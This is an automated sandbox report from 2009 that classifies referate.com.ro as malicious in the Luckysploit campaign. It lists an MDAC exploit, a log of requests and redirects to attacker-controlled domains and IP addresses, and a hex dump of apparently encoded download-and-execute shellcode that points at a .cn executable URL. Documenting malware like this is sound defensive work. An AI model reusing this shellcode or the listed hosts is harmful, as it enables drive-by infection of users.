Analysis report for http://www.referate.com.ro

Sample Overview

URL:               http://www.referate.com.ro
MD5:               32c7a12ecd8b06c34809e66f00cbeb4e
Analysis Started:  2009-04-29 18:07:22
Report Generated:  2009-04-29 18:07:52
Jsand version:     1.03.02

Detection results

Detector        Result
Jsand 1.03.02   malicious

This resource appears to be involved in the Luckysploit malware campaign.

Exploits

Name   Description                                                                Reference
MDAC   Arbitrary file download via the Microsoft Data Access Components (MDAC)   CVE-2006-0003

Deobfuscation results

Evals

Writes

Network Activity

Requests

URL  |  Status  |  Content Type
http://www.referate.com.ro  |  200  |  text/html
http://referate.com.ro/templates/main.js  |  404  |  text/html
http://netwindows.ro/adnet/www/delivery/ajs.php?zoneid=1679&cb=68241738715&loc=http://www.referate.com.ro  |  200  |  text/javascript
http://netwindows.ro/adnet/www/delivery/ajs.php?zoneid=1680&cb=68986274655&loc=http://www.referate.com.ro  |  200  |  text/javascript
http://netwindows.ro/adnet/www/delivery/ajs.php?zoneid=1679&cb=47135302922&loc=http://www.referate.com.ro  |  200  |  text/javascript
about:blank  |  200  |  text/html
http://netwindows.ro/adnet/www/delivery/ajs.php?zoneid=1679&cb=85634348335&loc=http://www.referate.com.ro  |  200  |  text/javascript
http://95.129.144.229/stats/stats.js  |  200  |  text/javascript
http://storage.trafic.ro/js/trafic.js  |  200  |  text/javascript
http://ts.trafic.ro/js/trafic.js?tk=9130691356856244&t_rid=referatecom1  |  200  |  text/javascript
http://tixwagoq.cn/in.cgi?14  |  302  |  text/html
http://gukgifoc.cn/nuc/index.php  |  200  |  text/html
http://95.129.144.229/1  |  302  |  text/html
http://84.244.138.55/ts/in.cgi?sltest  |  302  |  text/html
http://84.244.138.55/ase/?t=13  |  200  |  text/html
http://84.244.138.55/ase/?0154e6e2b1e26433bacc0c80138bb5b9ddf1f1ed674a354263875bd3cf5f58687b7310cfaed3335f13c435b50db7bca892c70483e08d29ff6e5437141c3db24f  |  200  |  text/javascript
http://84.244.138.55/ase/?39104f0b1c41851ca6f30c12a1913f1a8fac6a3c73094f43e8e13a3b663b0a3162fcea46cf6082fcb576a0475e2e524d829b0b0269dad96a21e3c8e713876389  |  200  |  text/javascript
http://tojandglow.com/Advanced_Traffic/out.php?s_id=1  |  302  |  text/html
http://91.212.65.138/in.php  |  Timeout  |  application/x-empty

Redirects

From  ->  To
http://tixwagoq.cn/in.cgi?14  ->  http://gukgifoc.cn/nuc/index.php
http://95.129.144.229/1  ->  http://84.244.138.55/ts/in.cgi?sltest
http://84.244.138.55/ts/in.cgi?sltest  ->  http://84.244.138.55/ase/?t=13
http://tojandglow.com/Advanced_Traffic/out.php?s_id=1  ->  http://91.212.65.138/in.php

ActiveX controls

Shellcode and Malware

Hexadecimal                                        ASCII
43 43 43 43 eb 0f 5b 33  c9 66 b9 80 01 80 33 ef   CCCC..[3.f....3.
43 e2 fa eb 05 e8 ec ff  ff ff 7f 8b 4e df ef ef   C...........N...
ef 64 af e3 64 9f f3 42  64 9f e7 6e 03 ef eb ef   .d..d..Bd..n....
ef 64 03 b9 87 61 a1 e1  03 07 11 ef ef ef 66 aa   .d...a........f.
eb b9 87 77 11 65 e1 07  1f ef ef ef 66 aa e7 b9   ...w.e......f...
87 ca 5f 10 2d 07 0d ef  ef ef 66 aa e3 b9 87 00   .._.-.....f.....
21 0f 8f 07 3b ef ef ef  66 aa ff b9 87 2e 96 0a   !...;...f.......
57 07 29 ef ef ef 66 aa  fb af 6f d7 2c 9a 15 66   W.)...f...o.,..f
aa f7 06 e8 ee ef ef b1  66 9a cb 64 aa eb 85 ee   ........f..d....
b6 64 ba f7 b9 07 64 ef  ef ef bf 87 d9 f5 c0 9f   .d....d.........
07 78 ef ef ef 66 aa f3  64 2a 6c 2f bf 66 aa cf   .x...f..d*l/.f..
87 10 ef ef ef bf 64 aa  fb 85 ed b6 64 ba f7 07   ......d.....d...
8e ef ef ef ec aa cf 28  ef b3 91 c1 8a 28 af eb   .......(.....(..
97 8a ef ef 10 9a cf 64  aa e3 85 ee b6 64 ba f7   .......d.....d..
07 af ef ef ef 85 e8 b7  ec aa cb dc 34 bc bc 10   ............4...
9a cf bf bc 64 aa f3 85  ea b6 64 ba f7 07 cc ef   ....d.....d.....
ef ef 85 ef 10 9a cf 64  aa e7 85 ed b6 64 ba f7   .......d.....d..
07 ff ef ef ef 85 10 64  aa ff 85 ee b6 64 ba f7   .......d.....d..
07 ef ef ef ef ae b4 bd  ec 0e ec 0e ec 0e ec 0e   ................
6c 03 eb b5 bc 64 35 0d  18 bd 10 0f ba 64 03 64   l....d5......d.d
92 e7 64 b2 e3 b9 64 9c  d3 64 9b f1 97 ec 1c b9   ..d...d..d......
64 99 cf ec 1c dc 26 a6  ae 42 ec 2c b9 dc 19 e0   d.....&..B.,....
51 ff d5 1d 9b e7 2e 21  e2 ec 1d af 04 1e d4 11   Q......!........
b1 9a 0a b5 64 04 64 b5  cb ec 32 89 64 e3 a4 64   ....d.d...2.d..d
b5 f3 ec 32 64 eb 64 ec  2a b1 b2 2d e7 ef 07 1b   ...2d.d.*..-....
11 10 10 ba bd a3 a2 a0  a1 ef 68 74 74 70 3a 2f   ..........http:/
2f 67 75 6b 67 69 66 6f  63 2e 63 6e 2f 6e 75 63   /gukgifoc.cn/nuc
2f 65 78 65 2e 70 68 70                            /exe.php

No additional malware was retrieved.